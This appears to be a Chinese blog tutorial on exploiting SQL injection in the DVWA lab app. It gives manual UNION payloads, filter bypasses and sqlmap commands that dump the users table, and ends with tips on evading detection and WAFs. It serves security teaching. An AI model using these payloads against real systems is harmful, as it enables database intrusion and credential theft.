DVWA之SQL注入漏洞与SQLmap

一:怎么判断SQL注入漏洞

输入以下语句:

1'and 1=1#

输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句

而对于以下语句,可以发现没有语句,SQL语句变化,1 != 2,不能得到输出

1'and 1=2#

对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。

二:怎么利用SQL注入漏洞

步骤一:判断列/字段数,利用语句 order by [列/字段数]

输入以下语句:

1' order by 1#
1' order by 2#
1' order by 3#

对于上面三句语句,依次进行判断,可以得到

输入1' order by 1#得到

输入1' order by 2# 得到

 

输入1' order by 3# 得到

 

所以得到这个数据库的表只有两列/两个字段

步骤二:联合查询其他信息

用户输入SQL语句,执行了MySQL内置函数user(),database()

其中user()返回当前数据库连接用户,database()返回当前数据库名称

输入以下语句

1' union select user(),database()#

步骤三:联合查询表

 输入以下语句

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#
 步骤四:联合查询信息

输入以下语句

1' union select uesr,password from user#

三:SQLmap自动化SQL注入利用过程

步骤一:检测漏洞

在输入框中任意写入一个数据1,拷贝上面的链接为

http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

接着按f12进入到开发者模式,点击Network (网络),然后点击Reload(重新加载)

点击第一个,找到cookie,复制下来,即是以下语句

security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada

输入语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"

可以得到

 

步骤二:获取数据库名

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --dbs  

可以得到

 可以看到有两个数据库

步骤三:或者指定数据库表

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa --tables

其中

-D:Database指定想要获取的数据库名为dvwa

--tables:列出数据库表

得到

 

步骤四:获取指定数据库列/表项

 输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --columns

其中

-T:Table指定想要获取的名为users,

--column:列出表项/列

得到

 

步骤五:获取数据

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --dump

 --dump:代表获取数据

可以得到:

 

三:SQL injection防御--过滤用户输入内容,不让输入sql语句

原理:将特殊符号替换成空,或判断用户输入sql语句就终止执行

将DVWA等级换成medium(转移了特殊字符) 

上面语句为原本的SQL语句,下面语句为过滤后的语句 

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#

1\' union select table_name,table_schema from information_schema.tables where table_schema=\'dvwa\'#

SQL语句错了,没有'\'符号

两种解决办法:

方法一:将dvwa替换成database()

1' union select table_name,table_schema from information_schema.tables where table_schema=database()#

方法二:将dvwa替换成十六进制格式 

1' union select table_name,table_schema from information_schema.tables where table_schema=0x64767761#

 将DVWA等级换成high等级

DVWA high防御中缺少传入数据的过滤,无法防御注入漏洞

### 使用Sqlmap针对DVWA Medium Level SQL Injection进行渗透测试 对于DVWA中的SQL注入漏洞,在中等安全级别下,可以利用`sqlmap`工具来进行自动化检测和数据提取。为了成功实施这一过程,确保设置正确的参数来匹配目标环境的要求。 #### 准备工作 在启动`sqlmap`之前,先要访问DVWA页面并登录,调整安全性等级至Medium。接着通过浏览器开发者工具捕获请求,从中复制带有有效会话ID(`PHPSESSID`)的Cookie值[^2]。 #### 构建命令行指令 构建用于发起攻击的命令如下所示: ```bash sqlmap -u "http://<target-ip>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=<your-session-id>;security=medium" \ --dbms=mysql --technique=E --level=5 --risk=3 --random-agent ``` 此命令指定了URL路径、必要的Cookies以及数据库管理系统类型(MySQL),同时还设置了技术选项(Technique)为基于错误(Error-based)的方式,并提高了扫描强度(Level)风险(Risk)。 - `-u`: 指定目标网址。 - `--cookie`: 提供必需的身份验证信息。 - `--dbms`: 明确指出使用的DBMS种类以便更精确地探测。 - `--technique=E`: 采用基于错误的技术进行尝试。 - `--level=5`: 设置详细的测试水平。 - `--risk=3`: 增加潜在危险操作的可能性。 - `--random-agent`: 随机更改User-Agent头以规避某些防护机制。 #### 获取敏感信息 一旦确认存在可利用的漏洞,可以通过附加更多参数进一步挖掘有价值的数据,比如枚举表名或列名甚至导出具体记录。例如,想要查看名为`users`表格的内容,则追加相应选项: ```bash -D dvwa -T users -C username,password --dump ``` 这将指示`sqlmap`连接到指定数据库(Dvwa),定位特定表(Users)及其字段(User,Password),最后输出所有条目。 #### 注意事项 在整个过程中务必遵守法律法规,仅限于授权范围内开展此类活动。此外,考虑到实际环境中可能存在的防御措施(如WAF),适当调节配置项有助于提高成功率的同时减少被发现的风险。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值